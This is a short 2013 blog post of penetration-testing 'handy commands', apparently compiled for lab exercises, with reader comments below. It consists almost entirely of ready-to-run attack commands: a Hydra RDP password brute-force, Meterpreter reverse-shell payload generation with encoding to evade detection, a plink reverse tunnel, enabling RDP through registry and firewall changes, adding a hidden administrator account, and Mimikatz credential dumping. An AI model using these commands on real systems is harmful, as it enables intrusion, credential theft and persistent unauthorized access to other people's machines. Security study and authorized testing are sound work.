Thursday, 12 December 2013

Penetration Testing Necessary Links and Handy Commands

I personally need quick access to a few commands and some links while working on penetration testing exercises, so I decided to post the information below on this blog :)

General Links:

Privilege Escalation Links:
Handy Commands:

Scan all ports at a rate of 10000 packets per second:

unicornscan X.X.X.X:a -r10000 -v


python -c 'import pty;pty.spawn("/bin/bash")'   (Spawn an interactive TTY shell)
python -m SimpleHTTPServer   (Start a simple HTTP server, default port 8000)


hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c

Plink Tunnel:

plink.exe -P 22 -l root -pw "1234" -R 445: X.X.X.X

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln


Meterpreter Scripts:

run getgui -u admin -p 1234
run vnc -p 5043

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add


Mimikatz:

sekurlsa::logonPasswords full

Compiling Windows Exploits on Backtrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Nasm Command:

nasm -f bin -o payload.bin payload.asm

To be continued...

Hope it's helpful to all of you!


  1. My last night in the lab tonight!!! Great post!!! Wish you had posted this a long time ago!! hehe

  2. hehe.. thanks buddy.. I will share more info soon..!

  3. Thanks for sharing. I learn a lot from your blog. I have read your blog about Penetration Testing; it is very helpful. I really enjoyed reading it; you may be a great author. I must say you've done a wonderful job by sharing your article with us. External penetration testing